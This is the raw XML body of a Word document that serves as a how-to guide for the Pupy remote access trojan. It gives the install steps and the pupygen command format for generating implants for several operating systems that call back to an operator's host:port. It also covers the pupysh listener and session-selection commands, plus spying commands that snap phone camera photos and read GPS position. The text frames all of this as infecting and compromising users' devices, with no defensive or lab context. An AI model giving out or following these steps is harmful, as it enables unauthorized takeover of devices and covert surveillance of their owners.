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499" w:rsidRDefault="00DC4499">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00DC4499" w:rsidRDefault="00E5129B" w:rsidP="00E5129B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E5129B">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Pupy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F442A" w:rsidRDefault="004F442A" w:rsidP="00E5129B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004F442A" w:rsidRDefault="004F442A" w:rsidP="004F442A">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F442A">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="4" name="Picture 4" descr="Image result for pupy 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upy ra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rsidR="00E5129B" w:rsidRDefault="00E5129B" w:rsidP="00E5129B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E5129B" w:rsidRPr="00E5129B" w:rsidRDefault="00E5129B" w:rsidP="00E5129B">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Pupy is a Remote Administration tool (RAT) written in python that allows you to generate files to take over operating systems remotely. It is one of the most popular RAT packages available online since it is open-source and cross-platform(windows, Linux, OSX).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC4499" w:rsidRDefault="00DC4499">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496124">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Installation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C4241" w:rsidRDefault="009C4241">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>There are many ways to install pupy</w:t>
      </w:r>
      <w:r w:rsidR="007F320B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007F320B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">he simplest to install is </w:t>
      </w:r>
      <w:r w:rsidR="000E1899">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">following. Type every command line by line. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C4241" w:rsidRPr="009C4241" w:rsidRDefault="009C4241">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DC4499" w:rsidRDefault="00DC4499">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5000ABC0" wp14:editId="345AE698">
            <wp:extent cx="5943600" cy="8083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808355"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C4241" w:rsidRDefault="009C4241">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00115C6F" w:rsidRDefault="00115C6F">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00115C6F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>This guide is meant for users who used this installation method. Most of the commands will work if another installation method is used, but they require a bit of modification</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00115C6F" w:rsidRPr="00115C6F" w:rsidRDefault="00115C6F">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DC4499" w:rsidRPr="00496124" w:rsidRDefault="00DC4499">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496124">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Running</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC4499" w:rsidRDefault="00E5129B">
      <w:r>
        <w:t>Pupy is made of two components</w:t>
      </w:r>
      <w:r w:rsidR="00DC4499">
        <w:t xml:space="preserve">:  </w:t>
      </w:r>
      <w:r w:rsidR="00DC4499" w:rsidRPr="00DC4499">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>pupygen</w:t>
      </w:r>
      <w:r w:rsidR="00DC4499">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00DC4499" w:rsidRPr="00DC4499">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>pupysh</w:t>
      </w:r>
      <w:r w:rsidR="00DC4499">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Working in conjunction they you to create files to infect user devices and send commands to those to retrieve data available.</w:t>
      </w:r>
      <w:r w:rsidR="00DC4499">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC4499" w:rsidRDefault="00DC4499"/>
    <w:p w:rsidR="00DC4499" w:rsidRPr="00496124" w:rsidRDefault="00DC4499">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496124">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Pupygen</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C1E97" w:rsidRDefault="006E0C48">
      <w:r w:rsidRPr="006E0C48">
        <w:t xml:space="preserve">Pupygen generates the file that </w:t>
      </w:r>
      <w:r>
        <w:t>can</w:t>
      </w:r>
      <w:r w:rsidRPr="006E0C48">
        <w:t xml:space="preserve"> run on the targets computer and pupy</w:t>
      </w:r>
      <w:r>
        <w:t>sh</w:t>
      </w:r>
      <w:r w:rsidRPr="006E0C48">
        <w:t xml:space="preserve"> manages the targets systems.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> It can generate files for windows, android, </w:t>
      </w:r>
      <w:r w:rsidR="00E5129B">
        <w:t>Linux,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Solaris operating systems.  This allows the user </w:t>
      </w:r>
      <w:r w:rsidR="00E5129B">
        <w:t>to compromise</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a vast amount of systems.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E0C48" w:rsidRDefault="006E0C48">
      <w:r>
        <w:t>An example command to generate a file is as follows</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C1E97" w:rsidRDefault="000C1E97">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="352897A4" wp14:editId="781BE6B8">
            <wp:extent cx="5943600" cy="3168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16865"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C1E97" w:rsidRDefault="000C1E97">
      <w:r>
        <w:t xml:space="preserve">The format of the command is </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C1E97" w:rsidRPr="0070586C" w:rsidRDefault="000C1E97" w:rsidP="000C1E97">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070586C">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>-O {android, windows, linux, solaris} -A</w:t>
      </w:r>
      <w:r w:rsidR="006E0C48" w:rsidRPr="0070586C">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0070586C">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>{x</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0070586C">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>86,x</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0070586C">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">64} {connect –host host:port} -t </w:t>
      </w:r>
      <w:r w:rsidR="006E0C48" w:rsidRPr="0070586C">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>{ssl, http, ecm, obfse3, etc..} –output filename.ext</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E0C48" w:rsidRDefault="006E0C48" w:rsidP="006E0C48">
      <w:r>
        <w:t>As you can see there many options that you can work with.  You can select the architecture of file and</w:t>
      </w:r>
      <w:r w:rsidR="00E5129B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E5129B">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E5129B">
        <w:t xml:space="preserve"> address of the host machine</w:t>
      </w:r>
      <w:r>
        <w:t>.  You can also select the transport protocol.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C4241" w:rsidRDefault="009C4241" w:rsidP="006E0C48">
      <w:r>
        <w:t>To get more information on pupygen use the help parameter.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C4241" w:rsidRPr="009C4241" w:rsidRDefault="00AE449A" w:rsidP="009C4241">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="009C4241" w:rsidRPr="009C4241">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>upygen -h</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0070586C" w:rsidRPr="00496124" w:rsidRDefault="0070586C" w:rsidP="006E0C48">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496124">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Pupysh </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0070586C" w:rsidRDefault="0070586C" w:rsidP="006E0C48">
      <w:r>
        <w:t>Malware is used to infect thousands of computer</w:t>
      </w:r>
      <w:r w:rsidR="009C4241">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009C4241">
        <w:t>worldwide</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. How do hackers manage them </w:t>
      </w:r>
      <w:r w:rsidR="009C4241">
        <w:t>all?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Pupysh is an example on how its possible. It allows the user to command to the computers are infected with the malware generated by pupy.  It allows to select the computers you want to target. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0070586C" w:rsidRDefault="0070586C" w:rsidP="006E0C48">
      <w:r>
        <w:t>You can run it with:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0070586C" w:rsidRDefault="00AE449A" w:rsidP="0070586C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="0070586C" w:rsidRPr="0070586C">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>upysh</w:t>
      </w:r>
      <w:r w:rsidR="0070586C">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F65A3" w:rsidRDefault="004F65A3" w:rsidP="0070586C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004F65A3" w:rsidRDefault="004F65A3" w:rsidP="004F65A3"/>
    <w:p w:rsidR="004F65A3" w:rsidRDefault="004F65A3" w:rsidP="004F65A3"/>
    <w:p w:rsidR="004F65A3" w:rsidRPr="004F65A3" w:rsidRDefault="004F65A3" w:rsidP="004F65A3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Example of how the initial program start looks like</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F65A3" w:rsidRDefault="004F65A3" w:rsidP="0070586C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76E7BD8B" wp14:editId="38C92B11">
            <wp:extent cx="5505450" cy="4086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05450" cy="4086225"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F65A3" w:rsidRPr="004F65A3" w:rsidRDefault="004F65A3" w:rsidP="0070586C">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0070586C" w:rsidRDefault="0070586C" w:rsidP="0070586C">
      <w:r>
        <w:t xml:space="preserve"> Once pupysh is run, it will start listening to its default port and use the default transport protocol. To change this run:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0070586C" w:rsidRDefault="0070586C" w:rsidP="0070586C">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070586C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>listen -a ssl 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F65A3" w:rsidRPr="004F65A3" w:rsidRDefault="004F65A3" w:rsidP="004F65A3">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Remember this must be the port that was provided to the generated program</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0070586C" w:rsidRDefault="0070586C" w:rsidP="0070586C"/>
    <w:p w:rsidR="0070586C" w:rsidRDefault="00115C6F" w:rsidP="0070586C">
      <w:r>
        <w:t>After setting the correct</w:t>
      </w:r>
      <w:r w:rsidR="006D7EA0">
        <w:t xml:space="preserve"> port</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="006D7EA0">
        <w:t>the devices will now be able to communicate with your computer. You can see all the clients that you can communicate with using the following command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00115C6F" w:rsidRPr="006D7EA0" w:rsidRDefault="00115C6F" w:rsidP="00115C6F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D7EA0">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Sessions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC1A1D" w:rsidRDefault="00214697" w:rsidP="00115C6F">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08651538" wp14:editId="2000E2E0">
            <wp:extent cx="5943600" cy="161480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614805"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00115C6F" w:rsidRDefault="00115C6F" w:rsidP="00115C6F">
      <w:r>
        <w:t>Here it allows you select the individual machines that can be targeted.  To target a specific machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00115C6F" w:rsidRPr="006D7EA0" w:rsidRDefault="00115C6F" w:rsidP="00115C6F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D7EA0">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Sessions -I #</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00115C6F" w:rsidRDefault="00115C6F" w:rsidP="00115C6F">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00115C6F" w:rsidRDefault="00115C6F" w:rsidP="00115C6F">
      <w:r>
        <w:t>To get a list of commands that can be used to attack a system</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00115C6F" w:rsidRDefault="00115C6F" w:rsidP="00115C6F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00115C6F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>help -M</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00115C6F" w:rsidRDefault="00115C6F" w:rsidP="00115C6F">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This command will give you a list of commands that can be used on the specific system. These commands will be different depending on what operating system you are targeting. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00115C6F" w:rsidRDefault="00496124" w:rsidP="00115C6F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Examples</w:t>
      </w:r>
      <w:r w:rsidR="00115C6F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> of command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="009C4241">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C4241" w:rsidRDefault="009C4241" w:rsidP="00115C6F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Android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C4241" w:rsidTr="009C4241">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009C4241" w:rsidRPr="00496124" w:rsidRDefault="009C4241" w:rsidP="009C4241">
            <w:pPr>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:i/>
                <w:lang w:val="en"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00496124">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:i/>
                <w:lang w:val="en"/>
              </w:rPr>
              <w:t>webcamsnap</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009C4241" w:rsidRDefault="009C4241" w:rsidP="009C4241">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:lang w:val="en"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009C4241" w:rsidRDefault="009C4241" w:rsidP="009C4241">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:lang w:val="en"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:lang w:val="en"/>
              </w:rPr>
              <w:t xml:space="preserve">Used to take a photo through the </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:lang w:val="en"/>
              </w:rPr>
              <w:t>phones</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:lang w:val="en"/>
              </w:rPr>
              <w:t xml:space="preserve"> main camera</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009C4241" w:rsidTr="009C4241">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009C4241" w:rsidRPr="00496124" w:rsidRDefault="009C4241" w:rsidP="009C4241">
            <w:pPr>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:i/>
                <w:lang w:val="en"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00496124">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:i/>
                <w:lang w:val="en"/>
              </w:rPr>
              <w:t>gpstracker --get-position</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009C4241" w:rsidRDefault="009C4241" w:rsidP="009C4241">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:lang w:val="en"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009C4241" w:rsidRDefault="009C4241" w:rsidP="009C4241">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:lang w:val="en"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:lang w:val="en"/>
              </w:rPr>
              <w:t>Get the targets current longitude and latitude coordinates</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009C4241" w:rsidRDefault="00214697" w:rsidP="00214697">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E987A5A" wp14:editId="78A553EF">
            <wp:extent cx="5391150" cy="1676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91150" cy="1676400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00115C6F" w:rsidRPr="00496124" w:rsidRDefault="00115C6F" w:rsidP="00115C6F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
    </w:p>
